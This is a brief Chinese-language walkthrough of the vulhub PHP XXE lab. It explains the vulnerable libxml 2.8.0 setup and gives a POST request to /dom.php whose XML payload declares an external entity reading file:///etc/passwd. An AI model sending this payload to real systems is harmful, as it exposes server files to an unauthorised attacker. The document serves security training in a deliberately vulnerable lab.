https://github.com/vulhub/vulhub/tree/master/php/php_xxe
打开题目链接为 phpinfo信息页面
搜索 libxml版本,获取版本为 2.80,libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。
发送请求包
POST /dom.php
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>
flag在 phpinfo中